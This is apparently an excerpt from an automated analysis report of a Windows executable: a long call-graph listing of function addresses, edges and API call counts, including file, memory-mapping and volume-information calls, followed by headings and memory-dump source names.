7f8817 7987 40fec0 8 API calls 7983->7987 7986 410430 8 API calls 7985->7986 7988 7f83cf 7986->7988 7989 7f885a 7987->7989 7990 7f8524 7988->7990 7991 7f83e2 7988->7991 7993 40fec0 8 API calls 7989->7993 7992 411d20 21 API calls 7990->7992 7994 411d20 21 API calls 7991->7994 7996 7f854a 7992->7996 7997 7f886c 7993->7997 7995 7f8408 7994->7995 7998 45e650 41 API calls 7995->7998 7999 45e650 41 API calls 7996->7999 8000 411d20 21 API calls 7997->8000 8001 7f841e 7998->8001 8002 7f8560 7999->8002 8003 7f887f 8000->8003 8004 412220 25 API calls 8001->8004 8005 412220 25 API calls 8002->8005 8006 411e20 21 API calls 8003->8006 8007 7f8451 8004->8007 8008 7f8593 8005->8008 8009 7f8899 8006->8009 8010 411d20 21 API calls 8007->8010 8011 510740 58 API calls 8008->8011 8012 411e20 21 API calls 8009->8012 8013 7f8475 8010->8013 8014 7f85ad 8011->8014 8015 7f88b3 8012->8015 8018 411d20 21 API calls 8013->8018 8023 7f851f 8013->8023 8016 411d20 21 API calls 8014->8016 8017 40fec0 8 API calls 8015->8017 8016->8023 8019 7f88c5 8017->8019 8021 7f84a8 8018->8021 8020 411d20 21 API calls 8019->8020 8022 7f88d8 8020->8022 8024 45e650 41 API calls 8021->8024 8022->7402 8025 40fde0 8 API calls 8023->8025 8026 7f84be 8024->8026 8027 7f862b 8025->8027 8028 412220 25 API calls 8026->8028 8250 436880 8027->8250 8030 7f84f1 8028->8030 8239 510740 8030->8239 8031 7f8639 8033 7f87ff 8031->8033 8259 7f4670 8031->8259 8037 411d20 21 API calls 8033->8037 8035 411d20 21 API calls 8035->8023 8037->7983 8039 7f86ba 8040 411d20 21 API calls 8039->8040 8042 7f86dd 8040->8042 8044 45e650 41 API calls 8042->8044 8046 7f86f0 8044->8046 8049 412220 25 API calls 8046->8049 8051 7f8720 8049->8051 8053 411d20 21 API calls 8051->8053 8052 579ce0 88 API calls 8052->8039 8054 7f8749 8053->8054 8054->8033 8055 411d20 21 API calls 8054->8055 8056 7f8776 8055->8056 8057 45e650 41 API calls 8056->8057 8058 7f8789 8057->8058 8059 412220 25 API calls 8058->8059 8060 7f87b9 8059->8060 8289 579f50 8060->8289 8065 411d20 21 API calls 8065->8033 8067 411b70 8 API calls 8066->8067 8068 7f9158 8067->8068 8069 411b70 8 API calls 8068->8069 8070 7f916b 8069->8070 8071 411b70 8 API calls 8070->8071 8072 7f917b 8071->8072 8073 7f91c3 8072->8073 8074 440a70 40 API calls 8072->8074 8076 7f91ff 8073->8076 8077 440a70 40 API calls 8073->8077 8075 7f91bb 8074->8075 8080 40ef10 9 API calls 8075->8080 8079 413560 21 API calls 8076->8079 8078 7f91f7 8077->8078 8081 40ef10 9 API calls 8078->8081 8082 7f9222 8079->8082 8080->8073 8081->8076 8083 411d20 21 API calls 8082->8083 8084 7f9288 8083->8084 8085 45e650 41 API calls 8084->8085 8086 7f929b 8085->8086 8087 412220 25 API calls 8086->8087 8088 7f92cb 8087->8088 8089 411d20 21 API calls 8088->8089 8090 7f9304 8089->8090 8091 440a70 40 API calls 8090->8091 8094 7f934b 8090->8094 8092 7f9343 8091->8092 8093 40ef10 9 API calls 8092->8093 8093->8094 8095 413390 25 API calls 8094->8095 8097 7f94cb 8095->8097 8096 7f9525 8098 411d20 21 API calls 8096->8098 8097->8096 8099 413390 25 API calls 8097->8099 8100 7f956c 8098->8100 8099->8096 8101 45e650 41 API calls 8100->8101 8102 7f957f 8101->8102 8103 412220 25 API calls 8102->8103 8104 7f95ac 8103->8104 8299 7fb0f0 8104->8299 8107 411d20 21 API calls 8108 7f9603 8107->8108 8109 7f9633 8108->8109 8110 40ced0 8 API calls 8108->8110 8111 411d20 21 API calls 8109->8111 8110->8109 8112 7f965d 8111->8112 8113 411e20 21 API calls 8112->8113 8114 7f8155 8113->8114 8114->7939 8116 7f74f9 8115->8116 8119 7f7443 8115->8119 8117 40fde0 8 API calls 8116->8117 8118 7f7519 8117->8118 8118->7945 8118->7946 8119->8116 8307 44b3d0 8119->8307 8121 7f74c7 8311 44b130 8121->8311 8123 7f74ec 8124 410430 8 API calls 8123->8124 8124->8116 8126 45e65d 8125->8126 8127 45e683 8126->8127 8128 440a70 40 API calls 8126->8128 8127->7954 8129 45e67b 8128->8129 8130 40ef10 9 API calls 8129->8130 8130->8127 8132 7f543f 8131->8132 8133 7f545b 8132->8133 8134 7f544a 8132->8134 8136 44afb0 43 API calls 8133->8136 8369 44afb0 8134->8369 8137 7f5455 8136->8137 8138 44b130 58 API calls 8137->8138 8139 7f54a8 8138->8139 8140 410430 8 API calls 8139->8140 8141 7f54b5 8140->8141 8142 40fde0 8 API calls 8141->8142 8143 7f54bf 8142->8143 8144 40fde0 8 API calls 8143->8144 8145 7f54d3 8144->8145 8146 413560 21 API calls 8145->8146 8147 7f54e6 8146->8147 8147->7967 8149 442f1a 8148->8149 8150 442f42 8149->8150 8151 442f57 8149->8151 8152 410430 8 API calls 8150->8152 8153 443014 8151->8153 8154 442f68 8151->8154 8192 442f52 8152->8192 8156 4104b0 8 API calls 8153->8156 8373 434b10 8154->8373 8159 443024 8156->8159 8157 442f78 8378 434b60 8157->8378 8158 40fec0 8 API calls 8160 443761 8158->8160 8161 4104b0 8 API calls 8159->8161 8163 413560 21 API calls 8160->8163 8167 442fe9 8161->8167 8164 443774 8163->8164 8165 40fec0 8 API calls 8164->8165 8166 443786 8165->8166 8166->7951 8172 443059 8167->8172 8180 44313e 8167->8180 8168 442f99 8169 442fd6 8168->8169 8170 442feb 8168->8170 8171 4104b0 8 API calls 8169->8171 8173 434b10 8 API calls 8170->8173 8171->8167 8174 40fde0 8 API calls 8172->8174 8173->8167 8178 443062 8174->8178 8175 4431cb 8176 4431d4 8175->8176 8177 443741 8175->8177 8181 4431f5 8176->8181 8182 44332d 8176->8182 8179 410430 8 API calls 8177->8179 8187 4114b0 8 API calls 8178->8187 8188 4430be 8178->8188 8178->8192 8384 411190 8178->8384 8179->8192 8180->8175 8183 413390 25 API calls 8180->8183 8184 4113d0 8 API calls 8181->8184 8185 4113d0 8 API calls 8182->8185 8183->8180 8184->8192 8185->8192 8187->8178 8189 448740 8 API calls 8188->8189 8190 4430dd 8189->8190 8191 4114b0 8 API calls 8190->8191 8191->8192 8192->8158 8194 57a98c 8193->8194 8195 57a97a 8193->8195 8197 57a995 8194->8197 8201 57a9a7 8194->8201 8196 410430 8 API calls 8195->8196 8210 57a987 8196->8210 8199 410430 8 API calls 8197->8199 8198 57aa08 8390 57b7e0 8198->8390 8199->8210 8201->8198 8205 440a70 40 API calls 8201->8205 8207 57a9dc 8201->8207 8202 40fde0 8 API calls 8204 57aaa5 8202->8204 8203 57aa22 8206 410430 8 API calls 8203->8206 8204->7963 8209 57a9d4 8205->8209 8206->8210 8207->8198 8212 440a70 40 API calls 8207->8212 8208 57aa11 8208->8203 8214 57aa31 8208->8214 8211 40ef10 9 API calls 8209->8211 8210->8202 8211->8207 8213 57aa00 8212->8213 8215 40ef10 9 API calls 8213->8215 8216 57aa57 8214->8216 8217 57aa8a 8214->8217 8215->8198 8219 411190 8 API calls 8216->8219 8218 411580 8 API calls 8217->8218 8218->8210 8220 57aa68 8219->8220 8221 4116b0 8 API calls 8220->8221 8221->8210 8223 43742e 8222->8223 8399 448700 8223->8399 8227 43727f 8226->8227 8228 448740 8 API calls 8227->8228 8229 4372cd 8228->8229 8229->7976 8229->7977 8403 57ae50 SetLastError 8230->8403 8237 40fde0 8 API calls 8238 5792ce 8237->8238 8238->7976 8240 51076f 8239->8240 8241 413390 25 API calls 8240->8241 8242 5107d3 8241->8242 8243 51082d 8242->8243 8525 50f240 8242->8525 8528 510620 8242->8528 8244 413560 21 API calls 8243->8244 8245 51083e 8244->8245 8246 413560 21 API calls 8245->8246 8248 51084f 8246->8248 8248->8035 8251 411140 8250->8251 8252 436899 GetFileAttributesW 8251->8252 8253 43692d GetLastError 8252->8253 8254 4368ad 8252->8254 8255 4368bc 8253->8255 8254->8255 8256 4368d2 CreateFileW 8254->8256 8255->8031 8257 436915 GetLastError 8256->8257 8258 436909 CloseHandle 8256->8258 8257->8255 8258->8255 8260 7f46ad 8259->8260 8261 7f46e5 8260->8261 8549 43c060 8260->8549 8261->8039 8263 579f60 8261->8263 8560 57a260 8263->8560 8266 579ce0 8267 579d34 8266->8267 8269 579d3f 8266->8269 8268 4090f0 8 API calls 8267->8268 8268->8269 8270 579d77 8269->8270 8271 4090f0 8 API calls 8269->8271 8272 579dd2 SetLastError 8270->8272 8274 4090f0 8 API calls 8270->8274 8271->8270 8630 436cd0 8272->8630 8275 579daf 8274->8275 8275->8272 8276 579de7 8277 579e11 CreateFileW 8276->8277 8278 579e8f CloseHandle SetLastError 8277->8278 8279 579e4c SetFileTime 8277->8279 8280 409120 8 API calls 8278->8280 8279->8278 8281 579ea9 8280->8281 8282 409120 8 API calls 8281->8282 8283 579eb2 8282->8283 8284 409120 8 API calls 8283->8284 8285 579ebb 8284->8285 8286 579f70 8285->8286 8287 57a260 55 API calls 8286->8287 8288 579f7b 8287->8288 8288->8052 8290 57a260 55 API calls 8289->8290 8291 579f5b 8290->8291 8292 57a040 8291->8292 8293 57a058 8292->8293 8841 436de0 8293->8841 8297 411d20 21 API calls 8296->8297 8298 7f8aa4 8297->8298 8298->7983 8300 7fb10b 8299->8300 8301 7fb13a 8300->8301 8303 440a70 40 API calls 8300->8303 8302 412220 25 API calls 8301->8302 8304 7f95c1 8302->8304 8305 7fb132 8303->8305 8304->8107 8306 40ef10 9 API calls 8305->8306 8306->8301 8308 44b3ec 8307->8308 8309 44b3de 8307->8309 8308->8121 8337 44bb90 8309->8337 8313 44b155 8311->8313 8312 44b184 8314 44b1b8 8312->8314 8317 440c20 58 API calls 8312->8317 8313->8312 8316 440a70 40 API calls 8313->8316 8315 44b1f7 8314->8315 8318 440c20 58 API calls 8314->8318 8322 44b24f 8315->8322 8326 440c20 58 API calls 8315->8326 8319 44b17c 8316->8319 8320 44b1b0 8317->8320 8321 44b1ef 8318->8321 8323 40ef10 9 API calls 8319->8323 8324 40ef10 9 API calls 8320->8324 8325 40ef10 9 API calls 8321->8325 8351 44a6d0 8322->8351 8323->8312 8324->8314 8325->8315 8328 44b247 8326->8328 8330 40ef10 9 API calls 8328->8330 8330->8322 8331 44b293 8332 4113d0 8 API calls 8331->8332 8336 44b29e 8332->8336 8333 440a70 40 API calls 8334 44b28b 8333->8334 8335 40ef10 9 API calls 8334->8335 8335->8331 8336->8123 8338 44bbaa 8337->8338 8341 44b5e0 8338->8341 8340 44bbde 8340->8308 8342 44b608 8341->8342 8343 44b624 GetACP 8342->8343 8344 44b632 8342->8344 8345 44b63f GetCPInfo 8343->8345 8344->8345 8346 44b66d 8345->8346 8348 44b68a 8345->8348 8347 440a70 40 API calls 8346->8347 8349 44b682 8347->8349 8348->8340 8350 40ef10 9 API calls 8349->8350 8350->8348 8352 44a700 8351->8352 8353 44a6de 8351->8353 8354 44a736 8352->8354 8355 440c20 58 API calls 8352->8355 8353->8352 8356 440a70 40 API calls 8353->8356 8358 440c20 58 API calls 8354->8358 8359 44a76c 8354->8359 8357 44a72e 8355->8357 8360 44a6f8 8356->8360 8361 40ef10 9 API calls 8357->8361 8362 44a764 8358->8362 8363 44a7bb 8359->8363 8366 440c20 58 API calls 8359->8366 8364 40ef10 9 API calls 8360->8364 8361->8354 8365 40ef10 9 API calls 8362->8365 8363->8331 8363->8333 8364->8352 8365->8359 8367 44a7b3 8366->8367 8368 40ef10 9 API calls 8367->8368 8368->8363 8370 44afc0 8369->8370 8371 44afda 8369->8371 8370->8371 8372 44bb90 43 API calls 8370->8372 8371->8137 8372->8371 8374 410430 8 API calls 8373->8374 8375 434b21 8374->8375 8376 434b2f 8375->8376 8387 4106f0 8375->8387 8376->8157 8379 434b73 8378->8379 8380 4100a0 8 API calls 8379->8380 8382 434b8c 8380->8382 8381 434ba2 8381->8168 8382->8381 8383 434b98 CharLowerBuffW 8382->8383 8383->8381 8385 4100a0 8 API calls 8384->8385 8386 4111aa 8385->8386 8386->8178 8388 410610 8 API calls 8387->8388 8389 4106f9 8388->8389 8389->8376 8393 57b0d0 8390->8393 8392 57b7eb 8392->8208 8394 57b0e8 8393->8394 8398 57b117 8393->8398 8395 440a70 40 API calls 8394->8395 8394->8398 8396 57b10f 8395->8396 8397 40ef10 9 API calls 8396->8397 8397->8398 8398->8392 8400 44871c 8399->8400 8401 4117a0 8 API calls 8400->8401 8402 437442 8401->8402 8402->7965 8404 4374d0 9 API calls 8403->8404 8405 57ae7d GetLastError 8404->8405 8406 57aeb3 8405->8406 8407 57ae86 8405->8407 8408 40fde0 8 API calls 8406->8408 8407->8406 8409 43ea00 10 API calls 8407->8409 8410 5792b2 8408->8410 8411 57ae99 8409->8411 8415 579160 8410->8415 8448 440800 8411->8448 8413 57aeab 8414 40ef10 9 API calls 8413->8414 8414->8406 8452 579bc0 8415->8452 8417 579180 8418 5791c4 8417->8418 8479 57aef0 8417->8479 8419 40fde0 8 API calls 8418->8419 8421 5791ce 8419->8421 8426 436a90 8421->8426 8422 57919a 8422->8418 8423 440a70 40 API calls 8422->8423 8424 5791bc 8423->8424 8425 40ef10 9 API calls 8424->8425 8425->8418 8427 436abd 8426->8427 8428 436aee 8427->8428 8429 440a70 40 API calls 8427->8429 8520 442b60 8428->8520 8431 436adf 8429->8431 8433 40ef10 9 API calls 8431->8433 8433->8428 8434 4104b0 8 API calls 8435 436b08 8434->8435 8436 436960 4 API calls 8435->8436 8439 436b13 8436->8439 8437 40fec0 8 API calls 8438 436b9f 8437->8438 8440 40fde0 8 API calls 8438->8440 8441 437200 8 API calls 8439->8441 8442 436b2a 8439->8442 8447 436b51 8439->8447 8443 436ba8 8440->8443 8441->8442 8444 437200 8 API calls 8442->8444 8442->8447 8443->8237 8445 436b6c 8444->8445 8446 436a90 45 API calls 8445->8446 8446->8447 8447->8437 8451 44081e 8448->8451 8449 410430 8 API calls 8450 440842 8449->8450 8450->8413 8451->8449 8494 57a3e0 8452->8494 8457 579c11 8507 434ce0 8457->8507 8458 440a70 40 API calls 8460 579c09 8458->8460 8462 40ef10 9 API calls 8460->8462 8462->8457 8463 440a70 40 API calls 8464 579c3a 8463->8464 8465 40ef10 9 API calls 8464->8465 8466 579c42 8465->8466 8467 579c6e 8466->8467 8469 440a70 40 API calls 8466->8469 8468 579ca3 8467->8468 8517 579a10 8467->8517 8471 40fde0 8 API calls 8468->8471 8472 579c66 8469->8472 8475 579cad 8471->8475 8473 40ef10 9 API calls 8472->8473 8473->8467 8475->8417 8476 440a70 40 API calls 8477 579c9b 8476->8477 8478 40ef10 9 API calls 8477->8478 8478->8468 8480 411190 8 API calls 8479->8480 8481 57af35 8480->8481 8482 411190 8 API calls 8481->8482 8483 57af46 8482->8483 8484 411580 8 API calls 8483->8484 8486 57af57 8484->8486 8485 4117a0 8 API calls 8487 57b068 8485->8487 8486->8485 8488 57b08a 8487->8488 8489 411190 8 API calls 8487->8489 8490 40fec0 8 API calls 8488->8490 8492 57b07d 8489->8492 8491 57b09a 8490->8491 8491->8422 8493 4114b0 8 API calls 8492->8493 8493->8488 8496 57a3ee 8494->8496 8495 579be7 8500 57b460 8495->8500 8496->8495 8497 440a70 40 API calls 8496->8497 8498 57a414 8497->8498 8499 40ef10 9 API calls 8498->8499 8499->8495 8501 434ce0 8 API calls 8500->8501 8504 57b490 8501->8504 8502 40fec0 8 API calls 8503 579bf0 8502->8503 8503->8457 8503->8458 8505 411190 8 API calls 8504->8505 8506 57b4c3 8504->8506 8505->8506 8506->8502 8508 434cf9 8507->8508 8509 434d38 8508->8509 8514 434d29 8508->8514 8510 434d55 8509->8510 8513 434d5f 8509->8513 8511 40fde0 8 API calls 8510->8511 8512 434d36 8511->8512 8512->8463 8512->8466 8515 448740 8 API calls 8513->8515 8516 410430 8 API calls 8514->8516 8515->8512 8516->8512 8518 436960 4 API calls 8517->8518 8519 579a19 8518->8519 8519->8468 8519->8476 8521 410430 8 API calls 8520->8521 8523 442b70 8521->8523 8522 436afb 8522->8434 8523->8522 8524 4113d0 8 API calls 8523->8524 8524->8522 8531 50f260 8525->8531 8540 510640 8528->8540 8532 50f289 8531->8532 8534 440a70 40 API calls 8532->8534 8538 50f2b1 8532->8538 8533 50f251 8533->8242 8535 50f2a9 8534->8535 8536 40ef10 9 API calls 8535->8536 8536->8538 8537 440a70 40 API calls 8537->8538 8538->8533 8538->8537 8539 40ef10 9 API calls 8538->8539 8539->8538 8541 510669 8540->8541 8543 440a70 40 API calls 8541->8543 8547 510691 8541->8547 8542 510631 8542->8242 8544 510689 8543->8544 8545 40ef10 9 API calls 8544->8545 8545->8547 8546 440a70 40 API calls 8546->8547 8547->8542 8547->8546 8548 40ef10 9 API calls 8547->8548 8548->8547 8550 43c070 8549->8550 8552 43c0c1 8549->8552 8550->8552 8553 43bf60 8550->8553 8552->8261 8556 43bed0 8553->8556 8557 43bee3 8556->8557 8558 434200 58 API calls 8557->8558 8559 43bf19 8557->8559 8558->8559 8559->8552 8561 57a3e0 41 API calls 8560->8561 8562 57a297 8561->8562 8563 57b460 8 API calls 8562->8563 8564 57a2a0 8563->8564 8565 57a2c1 8564->8565 8567 440a70 40 API calls 8564->8567 8566 434ce0 8 API calls 8565->8566 8568 57a2ce 8566->8568 8569 57a2b9 8567->8569 8571 440a70 40 API calls 8568->8571 8574 57a2f2 8568->8574 8570 40ef10 9 API calls 8569->8570 8570->8565 8572 57a2ea 8571->8572 8573 40ef10 9 API calls 8572->8573 8573->8574 8575 57a31e 8574->8575 8576 440a70 40 API calls 8574->8576 8577 57ae50 14 API calls 8575->8577 8579 57a316 8576->8579 8578 57a32b 8577->8578 8597 57aad0 8578->8597 8581 40ef10 9 API calls 8579->8581 8581->8575 8583 436960 4 API calls 8584 57a346 8583->8584 8585 57a367 8584->8585 8586 440a70 40 API calls 8584->8586 8587 57a39c 8585->8587 8627 57a070 8585->8627 8589 57a35f 8586->8589 8588 40fec0 8 API calls 8587->8588 8591 579f6b 8588->8591 8592 40ef10 9 API calls 8589->8592 8591->8266 8592->8585 8594 440a70 40 API calls 8595 57a394 8594->8595 8596 40ef10 9 API calls 8595->8596 8596->8587 8598 57ab26 8597->8598 8599 40fde0 8 API calls 8598->8599 8600 57ab33 8599->8600 8601 434ce0 8 API calls 8600->8601 8602 57ab43 8601->8602 8603 4104b0 8 API calls 8602->8603 8604 57ab53 8603->8604 8605 411190 8 API calls 8604->8605 8606 57ab64 8605->8606 8607 411190 8 API calls 8606->8607 8608 57ab75 8607->8608 8609 411580 8 API calls 8608->8609 8610 57ab86 8609->8610 8611 411190 8 API calls 8610->8611 8615 57abe6 8610->8615 8611->8615 8612 4117a0 8 API calls 8613 57ad8e 8612->8613 8614 410430 8 API calls 8613->8614 8616 57ad9e 8614->8616 8615->8612 8617 40fde0 8 API calls 8616->8617 8618 57ada8 8617->8618 8619 40fec0 8 API calls 8618->8619 8620 57adb8 8619->8620 8621 40fde0 8 API calls 8620->8621 8622 57adc1 8621->8622 8623 40fde0 8 API calls 8622->8623 8624 57adca 8623->8624 8625 40fde0 8 API calls 8624->8625 8626 57a338 8625->8626 8626->8583 8628 436880 5 API calls 8627->8628 8629 57a079 8628->8629 8629->8587 8629->8594 8631 411140 8630->8631 8632 436d01 GetFileAttributesW 8631->8632 8633 436d21 8632->8633 8634 436d84 8632->8634 8648 434060 8633->8648 8635 40fec0 8 API calls 8634->8635 8637 436d94 8635->8637 8639 40fde0 8 API calls 8637->8639 8638 436d34 8638->8634 8641 437200 8 API calls 8638->8641 8642 436d70 8638->8642 8640 436d9d 8639->8640 8640->8276 8643 436d52 8641->8643 8644 436d79 GetFileAttributesW 8642->8644 8661 442b00 8643->8661 8644->8634 8647 411580 8 API calls 8647->8642 8649 43408b 8648->8649 8650 434175 8649->8650 8651 436880 5 API calls 8649->8651 8650->8638 8652 4340a1 8651->8652 8652->8650 8666 436470 8652->8666 8654 4340b5 8654->8650 8655 4340ca GetFileAttributesW 8654->8655 8655->8650 8656 4340df 8655->8656 8656->8650 8657 434115 CreateFileW 8656->8657 8657->8650 8658 434150 8657->8658 8699 433d50 8658->8699 8662 410430 8 API calls 8661->8662 8663 442b10 8662->8663 8664 436d5f 8663->8664 8665 4114b0 8 API calls 8663->8665 8664->8647 8665->8664 8667 413390 25 API calls 8666->8667 8668 4364ca 8667->8668 8669 413390 25 API calls 8668->8669 8670 4364e8 8669->8670 8671 436960 4 API calls 8670->8671 8672 4364fe 8671->8672 8673 43650d 8672->8673 8674 436880 5 API calls 8672->8674 8677 436624 8673->8677 8733 4372f0 8673->8733 8674->8673 8680 417be0 40 API calls 8677->8680 8678 442b00 8 API calls 8679 436532 8678->8679 8682 43653e GetVolumeInformationW 8679->8682 8681 436634 8680->8681 8683 440800 8 API calls 8681->8683 8684 43661f 8682->8684 8689 436589 GetDriveTypeW 8682->8689 8685 436646 8683->8685 8743 443d70 GetLastError 8684->8743 8687 40ef10 9 API calls 8685->8687 8690 4365e3 8687->8690 8689->8690 8691 40fec0 8 API calls 8690->8691 8692 43665e 8691->8692 8693 413560 21 API calls 8692->8693 8694 43666e 8693->8694 8695 413560 21 API calls 8694->8695 8696 43667e 8695->8696 8697 40fde0 8 API calls 8696->8697 8698 43668a 8697->8698 8698->8654 8700 40fde0 8 API calls 8699->8700 8702 433dbf 8700->8702 8701 433e67 8703 433e7d CreateFileMappingW 8701->8703 8704 433f6a 8701->8704 8702->8701 8718 433e27 8702->8718 8703->8704 8705 433ebe MapViewOfFile 8703->8705 8732 433e5b 8704->8732 8773 433c00 8704->8773 8706 433ef1 GetCurrentProcess 8705->8706 8707 433f5d CloseHandle 8705->8707 8770 4234a0 8706->8770 8707->8704 8710 40fec0 8 API calls 8713 433fe0 CloseHandle 8710->8713 8712 433f11 8715 433f50 UnmapViewOfFile 8712->8715 8717 411240 8 API calls 8712->8717 8713->8650 8714 410430 8 API calls 8716 433f96 8714->8716 8715->8707 8722 433aa0 8 API calls 8716->8722 8716->8732 8719 433f29 8717->8719 8720 411240 8 API calls 8718->8720 8723 433aa0 8 API calls 8719->8723 8721 433e3b 8720->8721 8758 433aa0 8721->8758 8726 433fb9 8722->8726 8724 433f39 8723->8724 8727 410430 8 API calls 8724->8727 8729 410430 8 API calls 8726->8729 8730 433f49 8727->8730 8729->8732 8730->8715 8731 410430 8 API calls 8731->8732 8732->8710 8734 437309 8733->8734 8735 437324 8734->8735 8739 437344 8734->8739 8738 4117a0 8 API calls 8735->8738 8736 4373f1 8737 40fde0 8 API calls 8736->8737 8742 436522 8737->8742 8738->8742 8739->8736 8740 437383 8739->8740 8741 4117a0 8 API calls 8740->8741 8741->8742 8742->8678 8746 443d90 8743->8746 8747 443e03 8746->8747 8748 443daf 8746->8748 8750 440a70 40 API calls 8747->8750 8749 43ea00 10 API calls 8748->8749 8751 443dc8 8749->8751 8752 443e01 8750->8752 8753 440c20 58 API calls 8751->8753 8754 40ef10 9 API calls 8752->8754 8753->8752 8755 443e26 8754->8755 8756 40fde0 8 API calls 8755->8756 8757 443d82 8756->8757 8757->8677 8762 433ae1 8758->8762 8759 40fec0 8 API calls 8760 433bc4 8759->8760 8760->8731 8761 411240 8 API calls 8761->8762 8762->8761 8763 433b41 8762->8763 8769 433b94 8762->8769 8764 4111e0 8 API calls 8763->8764 8765 433b69 8764->8765 8766 4117a0 8 API calls 8765->8766 8767 433b83 8766->8767 8768 411580 8 API calls 8767->8768 8768->8769 8769->8759 8784 422f10 8770->8784 8772 4234ba 8772->8712 8774 40fde0 8 API calls 8773->8774 8776 433c24 8774->8776 8775 433ce7 8775->8714 8778 433c49 8776->8778 8832 4208c0 8776->8832 8778->8775 8779 4090f0 8 API calls 8778->8779 8781 433c98 8779->8781 8780 433cdd 8783 409120 8 API calls 8780->8783 8781->8780 8782 4111e0 8 API calls 8781->8782 8782->8780 8783->8775 8785 422f22 8784->8785 8786 422f3f 8784->8786 8785->8786 8787 4208c0 9 API calls 8785->8787 8786->8772 8788 422f59 8787->8788 8789 4208c0 9 API calls 8788->8789 8790 422f73 8789->8790 8791 4208c0 9 API calls 8790->8791 8792 422f8d 8791->8792 8793 4208c0 9 API calls 8792->8793 8794 422fa7 8793->8794 8795 4208c0 9 API calls 8794->8795 8796 422fc1 8795->8796 8797 4208c0 9 API calls 8796->8797 8798 422fdb 8797->8798 8799 4208c0 9 API calls 8798->8799 8800 422ff5 8799->8800 8801 4208c0 9 API calls 8800->8801 8802 42300f 8801->8802 8803 4208c0 9 API calls 8802->8803 8804 423029 8803->8804 8805 4208c0 9 API calls 8804->8805 8806 423043 8805->8806 8807 4208c0 9 API calls 8806->8807 8808 42305d 8807->8808 8809 4208c0 9 API calls 8808->8809 8810 423077 8809->8810 8811 4208c0 9 API calls 8810->8811 8812 423091 8811->8812 8813 4208c0 9 API calls 8812->8813 8814 4230ab 8813->8814 8815 4208c0 9 API calls 8814->8815 8816 4230c5 8815->8816 8817 4208c0 9 API calls 8816->8817 8818 4230df 8817->8818 8819 4208c0 9 API calls 8818->8819 8820 4230f9 8819->8820 8821 4208c0 9 API calls 8820->8821 8822 423113 8821->8822 8823 4208c0 9 API calls 8822->8823 8824 42312d 8823->8824 8825 4208c0 9 API calls 8824->8825 8826 423147 8825->8826 8827 4208c0 9 API calls 8826->8827 8828 423161 8827->8828 8829 4208c0 9 API calls 8828->8829 8830 42317b 8829->8830 8831 4208c0 9 API calls 8830->8831 8831->8786 8833 4208ea GetProcAddress 8832->8833 8834 4208fd 8832->8834 8835 420931 8833->8835 8836 4109e0 8 API calls 8834->8836 8837 40fe30 8 API calls 8835->8837 8839 42090e 8836->8839 8838 42093b 8837->8838 8838->8778 8840 40fe30 8 API calls 8839->8840 8840->8835 8842 4104b0 8 API calls 8841->8842 8843 436e26 8842->8843 8844 436e9e 8843->8844 8845 436e38 GetFileAttributesW 8843->8845 8846 436ea7 SetFileAttributesW 8844->8846 8845->8844 8847 436e48 8845->8847 8848 436eb6 GetLastError 8846->8848 8849 436ebe 8846->8849 8850 434060 81 API calls 8847->8850 8848->8849 8851 40fec0 8 API calls 8849->8851 8853 436e55 8850->8853 8852 436ece 8851->8852 8852->8065 8853->8844 8854 436e91 8853->8854 8855 437200 8 API calls 8853->8855 8856 4104b0 8 API calls 8854->8856 8857 436e73 8855->8857 8856->8844 8858 442b00 8 API calls 8857->8858 8859 436e80 8858->8859 8860 411580 8 API calls 8859->8860 8860->8854 8862 7f4953 8861->8862 8863 7f4978 8862->8863 8864 440a70 40 API calls 8862->8864 8867 7f48d0 8863->8867 8865 7f496c 8864->8865 8866 40edf0 9 API calls 8865->8866 8866->8863 8868 7f48f4 8867->8868 8869 7f4919 8868->8869 8870 440a70 40 API calls 8868->8870 8869->7426 8871 7f490d 8870->8871 8872 40edf0 9 API calls 8871->8872 8872->8869 8875 7f484d 8873->8875 8874 7f488f 8877 413560 21 API calls 8874->8877 8875->8874 8876 440a70 40 API calls 8875->8876 8878 7f4883 8876->8878 8879 7f48a0 8877->8879 8880 40edf0 9 API calls 8878->8880 8879->7409 8880->8874 8882 40ff78 Sleep 8881->8882 8882->7454 8883 417be0 8884 417c0d 8883->8884 8891 417c47 8883->8891 8885 417c17 8884->8885 8886 417c49 8884->8886 8888 413d70 40 API calls 8885->8888 8887 4111e0 8 API calls 8886->8887 8887->8891 8889 417c22 8888->8889 8890 4100a0 8 API calls 8889->8890 8890->8891 8892 8167d0 8894 8167f0 8892->8894 8893 816834 8894->8893 8898 419e30 8894->8898 8897 40f940 8 API calls 8897->8893 8899 419e4b 8898->8899 8902 40f1e0 8899->8902 8901 419ec2 8901->8897 8903 40f206 8902->8903 8904 40f20d GetCurrentThreadId 8902->8904 8903->8904 8905 40f25c 8904->8905 8906 40f2c5 8905->8906 8910 419530 8 API calls 8905->8910 8907 40f320 8906->8907 8909 40f319 8906->8909 8908 40f940 8 API calls 8907->8908 8908->8909 8909->8901 8910->8906 8911 441590 8912 4415a1 8911->8912 8922 4415b2 8911->8922 8913 441601 8912->8913 8916 4415b0 8912->8916 8912->8922 8923 441500 8913->8923 8914 441618 8919 40ef10 9 API calls 8914->8919 8915 44160b 8918 40edf0 9 API calls 8915->8918 8920 440800 8 API calls 8916->8920 8921 441616 8918->8921 8919->8921 8920->8922 8922->8914 8922->8915 8931 409460 8923->8931 8926 441530 8928 440800 8 API calls 8926->8928 8927 441551 8929 440c20 58 API calls 8927->8929 8930 44154f 8928->8930 8929->8930 8930->8922 8932 419650 8 API calls 8931->8932 8933 40946a 8932->8933 8934 419650 8 API calls 8933->8934 8935 409475 8934->8935 8935->8926 8935->8927 8936 451410 8939 4513f0 8936->8939 8940 451406 8939->8940 8941 4513ff 8939->8941 8943 451330 8940->8943 8944 451347 VariantClear 8943->8944 8945 45135b 8943->8945 8949 451356 8944->8949 8946 451372 8945->8946 8947 451362 8945->8947 8946->8949 8950 40fde0 8 API calls 8946->8950 8948 40fe30 8 API calls 8947->8948 8948->8949 8949->8941 8950->8949

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1834420307.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1834394870.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834420307.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834882459.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834916911.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
